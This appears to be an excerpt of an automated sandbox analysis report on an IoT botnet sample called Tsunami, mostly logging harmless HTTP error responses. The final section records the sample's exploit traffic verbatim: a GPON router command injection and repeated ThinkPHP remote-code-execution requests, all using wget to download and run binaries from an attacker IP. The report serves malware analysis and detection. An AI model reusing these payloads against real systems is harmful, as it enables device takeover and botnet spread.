        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: application/jsonaccess-control-allow-origin: *content-length: 34date: Sat, 14 May 2022 00:13:17 GMTData Raw: 7b 22 63 6f 64 65 22 3a 34 30 34 2c 22 6d 65 73 73 61 67 65 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d Data Ascii: {"code":404,"message":"Not Found"}
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Content-Length: 106Set-Cookie: JSESSIONID=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; HttpOnlyConnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 14 May 2022 00:13:19 GMTServer: Apache/2.4.6 (CentOS) mpm-itk/2.4.7-01 OpenSSL/1.0.1e-fips mod_fcgid/2.3.9 PHP/5.4.16Content-Length: 217Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /cgi-bin/ViewLog.asp was not found on this server.</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0Date: Sat, 14 May 2022 00:13:19 GMTContent-Type: text/htmlContent-Length: 169Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0</center></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: Apache-Coyote/1.1Content-Type: text/html;charset=utf-8Content-Language: enContent-Length: 1007Date: Sat, 14 May 2022 00:13:21 GMTData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 37 2e 30 2e 35 32 20 28 55 62 75 6e 74 75 29 20 2d 20 45 72 72 6f 72 20 72 65 70 6f 72 74 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3c 21 2d 2d 48 31 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 48 32 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 48 33 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 42 4f 44 59 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 7d 20 42 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 50 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 41 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 41 2e 6e 61 6d 65 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 48 52 20 7b 63 6f 6c 6f 72 20 3a 20 23 35 32 35 44 37 36 3b 7d 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 20 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 2d 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 68 31 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 70 3e 3c 62 3e 74 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 72 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 6d 65 73 73 61 67 65 3c 2f 62 3e 20 3c 75 3e 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 75 3e 3c 2f 70 3e 3c 70 3e 3c 62 3e 64 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 3c 75 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 75 3e 3c 2f 70 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.8.0Date: Sat, 14 May 2022 00:13:21 GMTContent-Type: text/htmlContent-Length: 168Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 38 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.8.0</center></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 14 May 2022 01:13:23 GMTServer: WebsX-Frame-Options: SAMEORIGINCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: CherryPy/18.6.1Date: Sat, 14 May 2022 00:13:23 GMTVary: Accept-EncodingContent-Encoding: gzipContent-Length: 174
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 14 May 2022 00:13:26 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 14 May 2022 01:13:26 GMTServer: DNVRS-WebsCache-Control: no-cacheContent-Length: 207Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 64 6f 63 75 6d 65 6e 74 3a 20 2f 68 6f 6d 65 2f 61 70 70 2f 77 65 62 73 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open document: /home/app/webs/cgi-bin/ViewLog.asp</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 14 May 2022 02:17:04 GMTServer: DNVRS-WebsCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 14 May 2022 00:12:46 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 14 May 2022 00:13:39 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveKeep-Alive: timeout=8Vary: Accept-EncodingContent-Encoding: gzipData Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Sat, 14 May 2022 00:13:39 GMTContent-Type: text/htmlContent-Length: 178Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service UnavailableServer: AkamaiGHostMime-Version: 1.0Content-Type: text/htmlContent-Length: 268Expires: Sat, 14 May 2022 00:13:39 GMTDate: Sat, 14 May 2022 00:13:39 GMTConnection: keep-aliveData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 20 2d 20 44 4e 53 20 66 61 69 6c 75 72 65 3c 2f 48 31 3e 0a 54 68 65 20 73 65 72 76 65 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 62 6c 65 20 74 6f 20 73 65 72 76 69 63 65 20 79 6f 75 72 20 72 65 71 75 65 73 74 2e 20 20 50 6c 65 61 73 65 20 74 72 79 20 61 67 61 69 6e 0a 6c 61 74 65 72 2e 3c 50 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 31 31 26 23 34 36 3b 38 35 35 31 38 63 34 66 26 23 34 36 3b 31 36 35 32 34 38 37 32 31 39 26 23 34 36 3b 31 36 66 39 30 66 61 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Service Unavailable</TITLE></HEAD><BODY><H1>Service Unavailable - DNS failure</H1>The server is temporarily unable to service your request. Please try againlater.<P>Reference&#32;&#35;11&#46;85518c4f&#46;1652487219&#46;16f90fa</BODY></HTML>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Security-Policy: frame-src 'self' https://traefik.io https://*.traefik.io;Content-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Sat, 14 May 2022 00:13:42 GMTContent-Length: 19Connection: closeData Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlX-Frame-Options: SAMEORIGINContent-Length: 345Date: Sat, 14 May 2022 02:11:37 GMTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>404 - Not Found</title> </head> <body> <h1>404 - Not Found</h1> </body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: keep-aliveDate: Sat, 14 May 2022 00:13:41 GMTContent-Length: 10Server: Streamer 22.05.1Access-Control-Allow-Origin: *Access-Control-Allow-Methods: GET, PUT, DELETE, OPTIONSAccess-Control-Expose-Headers: Server, range, X-Run-Time, X-Sid, Content-Length, LocationAccess-Control-Allow-Headers: x-vsaas-session, x-no-redirect, origin, authorization, accept, range, content-type, x-add-effective, session, x-originatorData Raw: 4e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: Not found
        Source: qJlf2SjoW4String found in binary or memory: http://103.136.43.52/bin
        Source: qJlf2SjoW4String found in binary or memory: http://103.136.43.52/bins/Tsunami.mips;
        Source: qJlf2SjoW4String found in binary or memory: http://103.136.43.52/bins/Tsunami.x86
        Source: qJlf2SjoW4String found in binary or memory: http://103.136.43.52/zyxel.sh;
        Source: qJlf2SjoW4String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
        Source: qJlf2SjoW4String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding//%22%3E
        Source: qJlf2SjoW4String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
        Source: qJlf2SjoW4String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope//
        Source: unknownHTTP traffic detected: POST /GponForm/diag_Form?style/ HTTP/1.1User-Agent: Hello, WorldAccept: */*Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedData Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 33 2e 31 33 36 2e 34 33 2e 35 32 2f 62 69 6e 2b 2d 4f 2b 2f 74 6d 70 2f 67 61 66 3b 73 68 2b 2f 74 6d 70 2f 67 61 66 60 26 69 70 76 3d 30 Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://103.136.43.52/bin+-O+/tmp/gaf;sh+/tmp/gaf`&ipv=0
        Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
        Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
        Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
        Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
        Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
        Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
        Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
        Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
        Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
        Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
        Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
